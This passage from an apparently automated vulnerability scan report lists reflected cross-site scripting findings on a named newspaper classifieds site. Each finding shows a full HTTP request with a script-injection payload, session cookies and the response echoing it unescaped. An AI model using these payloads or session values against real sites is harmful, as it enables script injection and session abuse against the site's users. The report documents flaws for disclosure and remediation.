Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/rent7ad2b"-alert(1)-"6f787bddca5/apartment/-/-/usa:ny:newyork/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.88. http://www.classifieds.nypost.com/housing/rent/apartment/-/-/usa:ny:newyork/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/rent/apartment/-/-/usa:ny:newyork/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bad1"><script>alert(1)</script>63ee40d0fad was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/rent7bad1"><script>alert(1)</script>63ee40d0fad/apartment/-/-/usa:ny:newyork/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:52 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5Mjt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/rent7bad1"><script>alert(1)</script>63ee40d0fad/apartment/-/-/usa:ny:newyork/" />
...[SNIP]...

1.89. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d1b60"-alert(1)-"e28bfea4659 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housingd1b60"-alert(1)-"e28bfea4659/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housingd1b60"-alert(1)-"e28bfea4659/sale/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.90. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54945"><script>alert(1)</script>9f14a9819b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing54945"><script>alert(1)</script>9f14a9819b6/sale/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:46 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Njt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing54945"><script>alert(1)</script>9f14a9819b6/sale/" />
...[SNIP]...

1.91. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6665e"><script>alert(1)</script>8d16d82beca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /housing/sale6665e"><script>alert(1)</script>8d16d82beca/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4Nzt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/housing/sale6665e"><script>alert(1)</script>8d16d82beca/" />
...[SNIP]...

1.92. http://www.classifieds.nypost.com/housing/sale/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /housing/sale/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a03c7"-alert(1)-"846ae1a119a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /housing/salea03c7"-alert(1)-"846ae1a119a/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:24:48 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA4ODt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds housing/salea03c7"-alert(1)-"846ae1a119a/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.93. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac3ed"><script>alert(1)</script>7d4d5e2ea5e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /infoac3ed"><script>alert(1)</script>7d4d5e2ea5e/privacy/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/infoac3ed"><script>alert(1)</script>7d4d5e2ea5e/privacy/" />
...[SNIP]...

1.94. http://www.classifieds.nypost.com/info/privacy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd10f"-alert(1)-"09a106370b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /infofd10f"-alert(1)-"09a106370b4/privacy/ HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.0 404 Not Found
Date: Fri, 26 Nov 2010 20:25:01 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-nonclassifieds-_-nonclassifieds-_--_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-";
cmSetProduction();
cmCreateErrorTag("nonclassifieds infofd10f"-alert(1)-"09a106370b4/privacy/","10000000","ny-_-nonclassifieds-_-nonclassifieds-_-nypost USA-_-nypost-_-USA-_-nypost-_-error-_--_--_--_--_--_--_-");
</script>
...[SNIP]...

1.95. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4d69"><script>alert(1)</script>f53af88dd7b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /info/privacy/?a4d69"><script>alert(1)</script>f53af88dd7b=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:24:59 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzA5OTt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16512

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
<meta property="og:url" content="http://www.oodle.com/info/privacy/?a4d69"><script>alert(1)</script>f53af88dd7b=1" />
...[SNIP]...

1.96. http://www.classifieds.nypost.com/info/privacy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.classifieds.nypost.com
Path:   /info/privacy/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bb31"-alert(1)-"eaa692a63db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /info/privacy/?1bb31"-alert(1)-"eaa692a63db=1 HTTP/1.1
Host: www.classifieds.nypost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: otu=cbfed66148755e439126da6455913c97; a=dT1GQjIyRkZFQzRDRjAxNUY3; 90184176_clogin=l=1290805822&v=1&e=1290809422731; l=r%3D5; CoreID6=51956591237812908058225; sb_persisted=eyJmdnQiOiIxMjg5MTcyODM1Iiwidm4iOiIzIiwic3N0IjoiMTI5MDgwMjU3OCIsInNwdCI6MTI5MDgwMjY2OSwic3BkIjozLCJucHYiOjgsInN1ciI6IiJ9; loc_USA=YToxOntpOjA7YTo0OntzOjM6ImxvYyI7TjtzOjY6InJhZGl1cyI7czoyOiIyNSI7czo3OiJjb3VudHJ5IjtzOjM6IlVTQSI7czo5OiJyZWdpb25faWQiO3M6MToiNSI7fX0%3D; sb_session_id=c17ed75e-d5a1-4ad1-a683-d7c3460dd23f; multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMjY4ODt9; cmTPSet=Y; ots=60bf76744e7ba6b01d483d356eed1708; sb_permanent_id=f6b8beab-5e25-44e0-96ff-6a65205e33ce; UnicaID=3ba3b7OvjvD-WrLvxgh; loc_USA_selected=aTowOw%3D%3D; __qca=P0-309717630-1290805822624;

Response

HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 20:25:00 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.7j DAV/2
Cache-Control: private
P3P: CP="DSP IDC CUR ADM PSA PSDi OTPi DELi STP NAV COM UNI INT PHY DEM"
Set-Cookie: multivariate=YToyOntzOjY6Im55cG9zdCI7czo2OiJueXBvc3QiO3M6MTA6Il90aW1lc3RhbXAiO2k6MTI5MDgwMzEwMDt9; path=/; domain=.classifieds.nypost.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
>
<head>
<m
...[SNIP]...
_-nypost-_-info-_--_--_--_--_--_--_-";
odl.reporting.replyExtraFields = "ny-_-info-_-info-_--_-nypost-_-USA-_-nypost-_-info-_--_--_--_--_--_--_-";
cmSetProduction();
